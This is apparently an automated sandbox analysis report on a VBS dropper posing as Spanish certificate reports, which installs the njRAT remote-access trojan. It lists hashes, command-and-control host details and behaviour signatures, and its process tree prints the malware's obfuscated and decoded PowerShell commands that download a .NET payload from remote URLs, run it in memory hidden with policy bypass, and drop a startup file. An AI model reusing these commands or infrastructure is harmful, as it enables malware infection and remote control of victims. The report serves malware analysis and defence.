Analysis
-
max time kernel
177s -
max time network
179s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system -
submitted
11/10/2022, 20:10
Static task
static1
Behavioral task
behavioral1
Sample
0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
Resource
win7-20220812-en
General
-
Target
0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
-
Size
201KB
-
MD5
7630029622a80a4a6563200a053ac39c
-
SHA1
54bbc37e0fd0dfe0d23874c295e59fa303aac7ff
-
SHA256
7310fb74edb1596430ef2e68fd3d339df540ae79e78d74895697ac81a1533204
-
SHA512
03b8fde8a8d3264ae78567be466dd630951913b0ccf60c7f5430b34061e9c521350d9ed75d8984487f2f74d582365e8de89867924ab609b57ae31e0ddeb84d37
-
SSDEEP
96:dyYRYFYDnYHFLvTfJZf4UbbNhtF/Zldy2ILS8414NEWUvWZ1+AN1qHk:d9ua6Ay/ATm45ZJ1qE
Malware Config
Extracted
https://tinyurl.com/2erph6cs
Extracted
njrat
0.7NC
NYAN CAT
nyas22.duckdns.org:57831
8521e1f80fc24
-
reg_key
8521e1f80fc24
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 3 IoCs
flow | pid | Process
25 | 2132 | powershell.exe
30 | 2132 | powershell.exe
34 | 2132 | powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$%&\567R$%RTuy#dtyhtyf5667.vbs | powershell.exe
-
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2132 set thread context of 852 | 2132 | powershell.exe | 88
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid | Process
32 | powershell.exe
32 | powershell.exe
2132 | powershell.exe
2132 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 27 IoCs
description | pid | Process
Token: SeDebugPrivilege | 32 | powershell.exe
Token: SeDebugPrivilege | 2132 | powershell.exe
Token: SeDebugPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
Token: 33 | 852 | InstallUtil.exe
Token: SeIncBasePriorityPrivilege | 852 | InstallUtil.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
description | pid | Process | procid_target
PID 4468 wrote to memory of 32 | 4468 | WScript.exe | 85
PID 4468 wrote to memory of 32 | 4468 | WScript.exe | 85
PID 32 wrote to memory of 2132 | 32 | powershell.exe | 87
PID 32 wrote to memory of 2132 | 32 | powershell.exe | 87
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
PID 2132 wrote to memory of 852 | 2132 | powershell.exe | 88
Processes
-
C:\Windows\System32\WScript.exe (tree level 1)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gAkAC⌚⌚⌚A⌚⌚⌚gB⌚⌚⌚AH⌚⌚⌚AeQAiACMAZAB0AHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:32
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.2XZ/srefom/wen/47.05.312.19//:ptth' , $RodaCopy , '$%&/567R$%RTuy"#dtyhtyf5667' ))"
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (tree level 4)
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
3KB
MD5
f41839a3fe2888c8b3050197bc9a0a05
SHA1
0798941aaf7a53a11ea9ed589752890aee069729
SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5
50a8221b93fbd2628ac460dd408a9fc1
SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0